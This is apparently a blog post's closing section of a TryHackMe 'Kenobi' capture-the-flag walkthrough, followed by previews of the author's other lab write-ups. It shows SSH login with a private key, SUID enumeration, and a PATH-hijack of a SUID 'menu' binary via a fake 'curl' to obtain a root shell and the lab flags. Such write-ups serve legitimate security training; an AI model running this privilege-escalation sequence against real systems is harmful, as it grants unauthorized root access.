┌──(root💀kali)-[/home/kali]
└─# ssh -i id_rsa kenobi@10.10.81.7
The authenticity of host '10.10.81.7 (10.10.81.7)' can't be established.
ED25519 key fingerprint is SHA256:GXu1mgqL0Wk2ZHPmEUVIS0hvusx4hk33iTcwNKPktFw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.81.7' (ED25519) to the list of known hosts.
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

103 packages can be updated.
65 updates are security updates.


Last login: Wed Sep 4 07:10:15 2019 from 192.168.1.147
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

kenobi@kenobi:~$

Now for finish this machine we have to find out both flags which are user flag and root flag that normally is hiding in this paths: 
  • /home/user/user.txt
  • /root/root.txt
We have found and read the user.txt file, obtaining the user flag.

kenobi@kenobi:~$ ls
share user.txt
kenobi@kenobi:~$ cat user.txt
d0b0f3f53b6caa532a83915e19224899

Now, we have to escalate privileges and we should execute this command which you can see below, where we listed of SUID binaries, including /usr/bin/menu, which looks like a custom-built executable and could be a potential avenue for privilege escalation.

kenobi@kenobi:~$ find / -perm -4000 2>/dev/null
/sbin/mount.nfs
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/menu
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/at
/usr/bin/newgrp
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping
/bin/su
/bin/ping6
kenobi@kenobi:~$ /usr/bin/menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
HTTP/1.1 200 OK
Date: Thu, 10 Apr 2025 14:55:48 GMT
Server: Apache/2.4.18 (Ubuntu)
Last-Modified: Wed, 04 Sep 2019 09:07:20 GMT
ETag: "c8-591b6884b6ed2"
Accept-Ranges: bytes
Content-Length: 200
Vary: Accept-Encoding
Content-Type: text/html

In addition, as we know that the menu is vulnerable we should do the next steps as you can see below:
  1. echo /bin/bash > curl (cleverly we have to create a file named curl in the current directory and wrote /bin/bash into it.)
  2. chmod 777 curl (we have made the curl file executable by everyone)
  3. export PATH=:.$PATH (We have to modify the PATH environment variable. By prepending the current directory (.) to the PATH, you ensured that when the menu program tried to execute curl, it would find and execute the malicious curl file you created in the current directory before finding the actual system curl in /usr/bin/)
  4. echo $PATH (to listing path)
kenobi@kenobi:~$ echo /bin/bash > curl
kenobi@kenobi:~$ chmod 777 curl
kenobi@kenobi:~$ export PATH=.:$PATH
kenobi@kenobi:~$ echo $PATH
.:/home/kenobi/bin:/home/kenobi/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

Now If the modified has been done correctly, we should be able to  execute /bin/bash script with root privileges.

kenobi@kenobi:~$ /usr/bin/menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@kenobi:~# whoami
root
root@kenobi:~# ls
curl share user.txt
root@kenobi:~# cd ..
root@kenobi:/home# ls
kenobi
root@kenobi:/home# cd ..
root@kenobi:/# ls
bin etc initrd.img.old lost+found opt run srv usr vmlinuz.old
boot home lib media proc sbin sys var
dev initrd.img lib64 mnt root snap tmp vmlinuz
root@kenobi:/# find /root/root.txt
/root/root.txt
We have just read the contents of the root.txt file, obtaining the root flag.
root@kenobi:/# cat /root/root.txt
177b3cd8562289f37382721c28381f02

Thank you very much for reading this article

I hope you liked and learned something new

This article has been done with ethical proposes

Good Hack

Comments

Post a Comment

Entradas Populares

INTERNAL

Image
 INTERNAL(TRYHACKME) First of all, let's go execute nmap command to identify alives ports and version with this host 192.168.88.6 as you can see below. Key open ports and services include: Web Servers: Port 80 (HTTP):  Running  Apache2 Ubuntu Default Page . It supports  OPTIONS ,  TRACE  (flagged as potentially risky),  GET ,  HEAD , and  POST  methods. The webpage title is " INTERNAL ". SSH Protocol Port 22 (SSH): Running Linux . ┌──(root㉿kali)-[/home/luis/Descargas] └─# nmap -n -Pn -p- --min-rate 5000 -sC 10.10.216.78 -vvv Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-07 12:06 CEST NSE: Loaded 126 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 2) scan. Initiating NSE at 12:06 Completed NSE at 12:06, 0.00s elapsed NSE: Starting runlevel 2 (of 2) scan. Initiating NSE at 12:06 Completed NSE at 12:06, 0.00s elapsed Initiating SYN Stealth Scan at 12:06 Scanning 10.10.216.78 [65535 ports] Discove...
Read more »

TOR WEB BROWSER

Image
  TOR WEB BROWSER TOR INSTALLATION First of all; we're going to this link from the oficial webpage: https://www.torproject.org/es/download/   where we have to download this version our laptop, Windows and Linux but in my case I've had to download for Windows 10. When the program is installed we will press execute and we'll follow step by step:   We'll open and we'll see this image where you have to select the language and select ok to continue the instal l ation. In addition, we'll select the location wherever you want install the program, but in my case I prefer the default location and you'll able to select wherever you want. Now, we will be started the installation process and when it finished you will be able to see the picture below: TOR CONNECT If the process has been successful, you will be able to connect with the connect button which you can observe in both pictures below: ADD A BRIDGE ...
Read more »

activedirectory

Image
ACTIVEDIRECTORY (TRYHACKME) First of all, let’s go to execute nmap toolkit and we'll be able to start the enumeration of the ports as you can see below with this command: sudo nmap -n -Pn -p- --min-rate 5000 10.10.135.154 -vvv -sC -sV This revealed several open TCP ports with associated services, including: DNS (53),  HTTP  (80),  Kerberos (88),  RPC (135),  NetBIOS-SSN (139),  SMB (445),  RDP (3389),  WS-Management (5985)  LDAP (389, 636, 3268, 3269) Moreover, service and NSE script detection provided valuable information about the services running on these ports, such as IIS 10.0, Microsoft Windows Kerberos , Active Directory LDAP , and Microsoft Terminal Services . The SSL/TLS certificate information on port 3389 indicated the common name AttacktiveDirectory.spookysec.local, reinforcing the target as an Active Directory server. rdp-ntlm-info also provided details about the domain (THM-AD) and computer name (ATTACKTIVEDIREC) as you can se...
Read more »

PICKLE RICK

Image
  PICKLE RICK I'm going to realize the resolution of the machine Level Easy from Tryhackme called  Pickle Rick  which is a machine so easy to realize. First of all,  we can observe that in the picture bellow we have some inforamtion and I'm going to execute control +u  and we can see in the second picture below that we've obtained a  Username. I'm going to gathering information about machine and I have to enter in the Linux terminal and I must introduce this command which you canobserve in the picture below:   gobuster dir -u(url) http://10.10.99.188/ -w(password dictionary)  /usr/share/wordlist/dirb/common.txt -x (formato que quereos que busque) .txt*, .php, .login,  In this case, we can observe that scan has discovered this 4 webpages: /assests /denied.php /index.html /login.php /robots.txt Now, we can see such as the web page from /robots.txt   it seems the password in the picture below. Now, we've discovered this login web page...
Read more »

Metasploit Framework

Image
 METASPLOIT FRAMEWORK USE TO  AUXILIARY MODULE FROM METASPLOIT First of all, I have used the auxiliary modules from Metasploit-Framework which could allow me Scanning, see ports, SO version, vulnerability in applications etc, where you can see at the bottom of the picture if  I use this module whose name is: auxiliary/scanner/discovery/arp_sweep  (To verify the IPs listening in the network) Now, we can observe that when I have selected in the auxiliary module I have had to do this set up  that we can observe in the second page below: INTERFACE : This I've set up the network interface that in my case is the eth0 interface. RHOSTS :This I've set up the IP Address which I am finding out that in my case is 192.168.100.0/24 (all the IP Address from network that could be possible which I am analyzing). THREADS : Are the threads; it's the fast  that I want to analyze the IP Addresses but in my case there are 15 threads because I want to analize as fast as possible...
Read more »

HOSTING

Image
HOSTING First of all, let's go to hosting machine from active directory, for it  using arp-scan to discover active hosts on the local network, identifying 192.168.88.8 as you can see in below. ┌──(kali㉿kali)-[~] └─$ sudo arp-scan -I eth0 --localnet Interface: eth0, type: EN10MB, MAC: 08:00:27:43:73:bc, IPv4: 192.168.88.5 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.88.1 d8:44:89:50:2d:a3 (Unknown) 192.168.88.8 08:00:27:98:d4:bf PCS Systemtechnik GmbH 192.168.88.9 00:e0:4c:69:66:4a REALTEK SEMICONDUCTOR CORP. 3 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 2.075 seconds (123.37 hosts/sec). 3 responded ┌──(kali㉿kali)-[~] └─$ ping -c1 192.168.88.8 PING 192.168.88.8 (192.168.88.8) 56(84) bytes of data. 64 bytes from 192.168.88.8: icmp_seq=1 ttl=128...
Read more »

LOVE

Image
BUSCALOVE First of all, I am going to do this machine from cybersecurity labs called BuscaLove which is easy Level. For it, let’s go to open Linux terminal and we have to write the command when we can see in the picture below. cd Descargas In addition, we have to depress the unzip file whose name’s buscalove.zip you can see in the picture below. Now we have to deploy the vulnerability machine whose command is sudo bash auto_deploy.sh buscalove.tar we can see in the picture below. On the other hand, to start the attack at virtual machine, we must verify if the attacker machine is in the same range of IP Address and we have to introduce this command which is ping -c 3 172.18.0.2 we can see in the picture below. As I,ve just seen the IP Address it’s in the same range of my IP Address we have to introduce the command with nmap tool which is nmap -n -Pn 172.18.0.2 -p- - -min-rate 4000 -vvv( here you can see in this picture the scanner) but I’ve got it 2 ports: 22: open ssh 80: open http No...
Read more »

CHANGE MACHINE

Image
CHANGE  First of all, let's go to hosting machine from active directory, for it  using  arp-scan  to discover active hosts on the local network, identifying  192.168.88.8   as you can see in below . ┌──(root㉿kali)-[/home/luis] └─# arp-scan -I eth0 --localnet Interface: eth0, type: EN10MB, MAC: 08:00:27:4d:8a:0f, IPv4: 192.168.88.6 WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.88.1 d8:44:89:50:2d:a3 (Unknown) 192.168.88.4 00:e0:4c:97:01:a7 (Unknown) 192.168.88.5 00:d8:61:fa:c0:4a (Unknown) 192.168.88.7 08:00:27:b1:ae:9f (Unknown) 4 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.848 seconds (138.53 hosts/sec). 4 responded Now, let's go execute nmap command to identify alives ports and version with this host  192.168.88...
Read more »